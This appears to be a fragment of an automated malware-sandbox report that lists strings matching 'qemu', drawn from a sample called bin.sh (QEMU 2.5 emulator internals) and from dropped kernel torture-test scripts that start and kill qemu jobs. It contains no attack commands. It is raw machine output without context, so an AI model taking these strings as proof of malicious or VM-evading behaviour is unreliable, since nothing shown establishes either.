Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: aarch64_banked_spsr_indexupdate_spselhelper_msr_i_pstatehelper_access_check_cp_reghelper_access_check_cp_reghelper_exception_internalraise_exceptioncpu_has_workarm_el_is_aa64/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.cRegister redefined: cp=%d %d bit crn=%d crm=%d opc1=%d opc2=%d, was %s, now %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZTV16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.cextract64(env->exclusive_addr, 32, 32) == 0qemu: unhandled CPU exception 0x%x - aborting
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_join
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: protstart < endpage_set_flagsarm_el_is_aa64tb_gen_codecpu_restore_state_from_tbtb_unlocktb_lock/build/qemu-tYeErX/qemu-2.5+dfsg/cpu-exec.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/rcu.hcc->set_pcTrace %p [%08x] %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.cDisassembler disagrees with translator over instruction decoding
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_sem_post
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_event_reset
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_pid=$!
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_anon_ram_alloc
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: opts_accepts_any(opts)!errp || !*errpan identifierDuplicate ID '%s' for %s,id=id=%s%s%s=%s%s=%ld%s%s=%sopts != NULL/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.ca non-negative number below 2^64You may use k, M, G or T suffixes for kilobytes, megabytes, gigabytes and terabytes.opt->desc && opt->desc->type == QEMU_OPT_BOOLopt->desc && opt->desc->type == QEMU_OPT_NUMBERopt->desc && opt->desc->type == QEMU_OPT_SIZEIdentifiers consist of letters, digits, '-', '.', '_', starting with a letter.!permit_abbrev || list->implied_opt_name!defaults || list->merge_listsqemu_opts_foreachqemu_opts_validateqemu_opts_validateqobject_typeqemu_opts_from_qdict_1qemu_opts_from_qdictqemu_opts_set_defaultsopts_parseqemu_opts_createqemu_opt_foreachqemu_opt_set_numberqemu_opt_set_boolopt_setqemu_opt_unsetqemu_opt_get_size_helperparse_option_numberqemu_opt_get_number_helperparse_option_boolqemu_opt_get_bool_helperqemu_opts_print_helpparse_option_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_is_self
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_bool
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_find
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_irq
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_extend_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_anon_ram_free
Source: functions.sh0.8.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_cond_wait
Source: kvm-test-1-run.sh.8.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_size_helper
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/id.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_st_i32
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZN16QEMUDisassemblerD1Ev
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: thunk_convertthunk_register_struct_directthunk_register_struct/build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.ccc->handle_mmu_faulthandle_cpu_signalReserved virtual address too big
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.c
Source: kvm-test-1-run.sh.8.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_STRACE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: de/build/qemu-tYeErX/qemu-2.5+dfsg/util/mmap-alloc.c!(align & (align - 1))align >= getpagesize()qemu_ram_mmap-._id_subsys_str[id]%c%s%lu%02dqdev/build/qemu-tYeErX/qemu-2.5+dfsg/util/id.cid < ARRAY_SIZE(id_subsys_str)id_generate
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_mutex_destroy
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: tcg_gen_qemu_ld_i64
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qapi/qmp/qobject.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_st_i64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: Please report this to qemu-devel@nongnu.org
Source: functions.sh0.8.dr Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh0.8.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: deposit64tcg_optimize{discardset_labelmov_i32movi_i32setcond_i32movcond_i32ld8u_i32ld8s_i32ld16u_i32ld16s_i32st8_i32st16_i32add_i32sub_i32mul_i32div2_i32divu2_i32xor_i32shl_i32shr_i32sar_i32rotl_i32rotr_i32deposit_i32brcond_i32add2_i32sub2_i32mulu2_i32muls2_i32muluh_i32mulsh_i32brcond2_i32setcond2_i32ext8s_i32ext16s_i32ext8u_i32ext16u_i32bswap16_i32bswap32_i32not_i32neg_i32andc_i32orc_i32eqv_i32nand_i32nor_i32mov_i64movi_i64setcond_i64movcond_i64ld8u_i64ld8s_i64ld16u_i64ld16s_i64ld32u_i64ld32s_i64st8_i64st16_i64st32_i64add_i64sub_i64mul_i64div2_i64divu2_i64xor_i64rotl_i64rotr_i64deposit_i64ext_i32_i64extu_i32_i64extrl_i64_i32extrh_i64_i32brcond_i64ext8s_i64ext16s_i64ext32s_i64ext8u_i64ext16u_i64ext32u_i64bswap16_i64bswap32_i64bswap64_i64not_i64neg_i64andc_i64orc_i64eqv_i64nand_i64nor_i64add2_i64sub2_i64mulu2_i64muls2_i64insn_startexit_tbgoto_tbqemu_ld_i32qemu_st_i32qemu_ld_i64qemu_st_i64@C
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_module_dummy
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_vcpus
Source: functions.sh0.8.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: kvm.sh.8.dr Binary or memory string: --qemu-cmd)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_append
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_close
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: h2g_valid((unsigned long)host_raddr)ie->access == IOC_W*arg_type == TYPE_PTR*arg_type == TYPE_STRUCTse->convert[0] == NULL*field_types == TYPE_PTRVOIDarg_type[0] == TYPE_PTRie->access == IOC_RW/proc/self/cmdline /proc/self/maps [stack]h2g_valid(min)h2g_valid(max - 1)%ld (%s) 0%c/proc/self/%d//tmpTMPDIR%s/qemu-open.XXXXXXHost cmsg overflow
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_cond_destroy
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: _ZN16QEMUDisassemblerD0Ev
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_parse_noisily
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_oom_check
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: do_qemu_set_log
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: unhandled CPU exception 0x%x - aborting
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_set
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_find
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/fw-path-provider.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtoull
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate -smp qemu argument.
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.8.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strsep
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu.sstepbits
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h
Source: kvm-recheck-rcu.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: (UnconditionalBranchToRegister)N4vixl14DecoderVisitorEN4vixl12DisassemblerEN4vixl17PrintDisassemblerE/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.cUnknown device '%s' for bus '%s'Unknown device '%s' for default sysbusInitialization of device %s failed: %sgpio_list->num_out == 0 || !namegpio_list->num_in == 0 || !namen >= 0 && n < gpio_list->num_inBus '%s' does not support hotpluggingDevice '%s' does not support hotpluggingchild[%d]%s.%dhotpluggablehotplug-handlerDevice exit failed.Device initialization failed.bus != sysbus_get_default()!dev->realizedunnamed-gpio-in%s[%u]unnamed-gpio-out%s[%d]hotpluggedlegacy-%sparent_bus/machinehotplug_ctrl/unattachednon-qdev-gpio[*]device[%d]bus_get_realizedbus_set_realizedqbus_initfnqbus_finalizebus_unparentbus_unparentbus_class_initqdev_get_legacy_propertydevice_get_realizeddevice_set_realizeddevice_get_hotpluggabledevice_get_hotpluggeddevice_set_hotpluggeddevice_initfndevice_post_initdevice_finalizedevice_unparentdevice_realizedevice_unrealizedevice_class_initdevice_class_base_initdevice_resetqdev_alias_all_propertiesqdev_get_dev_pathbus_get_fw_dev_pathqbus_createqbus_realizeqdev_get_gpio_in_namedqdev_init_gpio_out_namedqdev_init_gpio_in_namedqdev_init_nofailqdev_reset_all_fnqbus_reset_oneqdev_unplugqdev_get_hotplug_handlerqdev_set_legacy_instance_idqdev_try_createqdev_fw_nameqdev_get_vmsd/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev-properties.cprop->info == &qdev_prop_bit64Attempt to set property '%s' on device '%s' (type '%s') after it was realizedAttempt to set property '%s' on anonymous device (type '%s') after it was realizedProperty %s.%s doesn't take value %ld (minimum: %ld, maximum: %ld)Property %s.%s doesn't take value '%ld', it's not a power of 2array size property %s may not be set more than oncestrncmp(name, PROP_ARRAY_LEN_PREFIX, strlen(PROP_ARRAY_LEN_PREFIX)) == 0Attempt to set link property '%s' on device '%s' (type '%s') after it was realizedProperty '%s.%s' can't take value '%s', it's in useProperty '%s.%s' doesn't take value '%s'Property '%s.%s' can't find value '%s'prop && prop->info == &qdev_prop_ptrWarning: global %s.%s has invalid class nameWarning: global %s.%s=%s not usedWarning: global %s.%s=%s ignored (%s)Address (bus/device/function) of the host device, example: 04:10.0A power of two between 512 and 32768Slot and optional function number, example: 06.0 or 06Logical CHS translation algorithm, auto/none/lba/large/rechsEthernet 6-byte MAC Address, example: 52:54:00:12:34:56%02x:%02x:%02x:%02x:%02x:%02xprop->info == &qdev_prop_bit<unset>%02x.%x%04x:%02x:%02x.%drc == sizeof(buffer) - 1len-nullParameter '%s' expects %spci_devfn%x.%x%nprop->user_provideduint32uint16BiosAtaTranslationLostTickPolicyptruint64uint8boolon/offget_sizeset_sizeqdev_prop_set_globals_for_typeqdev_prop_check_globalsqdev_prop_set_ptrqdev_prop_finderror_set_from_qdev_prop_errorset_prop_arraylenset_prop_arraylenget_pci_host_devaddrget_pci_host_devaddrset_pci_host_devaddrset_blocksizeset_pci_devfnget_enumset_enumget_ma
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_bool_helper
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_allocate_irq
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/hotplug.c
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate qemu -append arguments
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_mutex_lock_iothread
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_UNSET_ENV
Source: bin.sh, 6777.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: ?timestamp{ 'seconds': %ld, 'microseconds': %ld }/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.cqnull_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.cqobject_typeqint_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qstring.cqobject_typeqstring_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c!subqdict_len || subqdict[subqdict_len - 1] == '.'e->key != NULLe->value != NULLqobject_type(obj) == type%s.%sprefix%s.%isnprintf_ret < 32qdict_size(subqdict) > 0%s%usnprintf_ret < slen%s%u.qdict_array_entriesqdict_array_splitqdict_flatten_qlistqdict_get_objqdict_get_doubleqobject_typeqobject_decrefqentry_destroyqdict_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qlist.cqobject_typeqobject_decrefqlist_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qfloat.cqobject_typeqfloat_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.cqobject_typeqbool_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c\"\\\b\f\n\r\t\u%04X\u%04X
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_accept
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-i386
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: os_mem_prealloc: failed to reinstall signal handler/var!exec_dir[0]/proc/self/exepassword: cannot block signalscannot fork child processcannot unblock signalsqemu_forkqemu_init_exec_dirsocket_set_fast_reuseqemu: %s: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_log_items
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_hw_version
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_create
Source: kvm-test-1-run.sh.8.dr Binary or memory string: kill -KILL $qemu_pid
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.c
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.cparent->class_size <= ti->class_sizetype->instance_size >= sizeof(Object)%s:%d:%s: Object %p is not an instance of type %s
Source: functions.sh0.8.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_SINGLESTEP
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_log_filename
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_log
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_create
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_socket
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_get_self
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: cpu_write_elf64_qemunote
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_SIZE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu,unknown
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: halted runningT%02xthread:%02x;ContvCont;c;C;s;ST02E22E14qemu.sstepbitsENABLE=%x,NOIRQ=%x,NOTIMER=%xqemu.sstepQC1fThreadInfosThreadInfom%xThreadExtraInfo,CPU#%d [%s]OffsetsText=%08x;Data=%08x;Bss=%08xSupportedPacketSize=%x;qXfer:features:read+Xfer:features:read:target.xml<xi:include href=""/></target>AttachedW%02xS%02x%08x/%xX%02xlistenaccept(#
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_module_dummy%s/..block-iscsiblock-curlblock-rbdblock-dmgModule is not supported by system.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/rcu.c
Source: functions.sh0.8.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_ARGV0
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_event_wait
Source: functions.sh0.8.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_bool_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: marvell,xscaleintel,sa1100arm,arm11mpcorearm,arm1176arm,arm1136arm,arm946arm,arm926%s-arm-cpuqemu,unknownarm,cortex-a15arm,cortex-a9arm,cortex-a8arm,arm1026oldvalue == newvaluestart-powered-offpsci-conduitmidrarm1136-r2cortex-m3cortex-m4cortex-r5ti925tsa1110pxa250pxa255pxa260pxa261pxa262pxa270pxa270-a0pxa270-a1pxa270-b0pxa270-b1pxa270-c0pxa270-c5L2ECTLRA9_PWRCTLA9_DIAGA9_PWRDIAGNEONBUSYTLB_LOCKRTLB_LOCKWTLB_VATLB_PATLB_ATTRL2LOCKDOWNL2AUXCRATCMBTCMpmsav7-dregionhas-mpuhas_el3rvbarreset-hivecsreset-cbar
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_host_page_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_set_cloexec
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_thread_joinqemu_thread_createqemu_sem_waitqemu_sem_timedwaitqemu_sem_postqemu_sem_destroyqemu_sem_initqemu_cond_waitqemu_cond_broadcastqemu_cond_signalqemu_cond_destroyqemu_cond_initqemu_mutex_unlockqemu_mutex_lockqemu_mutex_destroyqemu_mutex_init/build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.cenvlist != NULLenvlist_free.so%s/%s%sQTAILQ_EMPTY(&dso_init_list)Failed to open module: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu: uncaught target signal %d (%s) - %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.cdo_sigprocmaskw
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: QEMU_UNAME
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_init_vcpu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: uleb128_encode_smallqemu_strtosz_suffix_unitbuffer_is_zerobuffer_find_nonzero_offset/build/qemu-tYeErX/qemu-2.5+dfsg/util/cutils.ccan_use_buffer_find_nonzero_offset(buf, len)len % (4 * sizeof(long)) == 0mul >= 0n <= 0x3fffwarning: %s not in [0, %d]
Source: functions.sh0.8.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.c
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/error.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opt_get_number_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_memalign
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_strtoll
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu builddir
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg-op.cUnrecognized operation %d in do_constant_folding.
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_absorb_qdict
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/syscall.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-lexer.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: %s/qemu-open.XXXXXX
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_loc_restore
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_foreach
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: module_load_file/build/qemu-tYeErX/qemu-2.5+dfsg/util/error.cUnexpected error in %s() at %s:%d:
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp Binary or memory string: qemu_opts_set_id
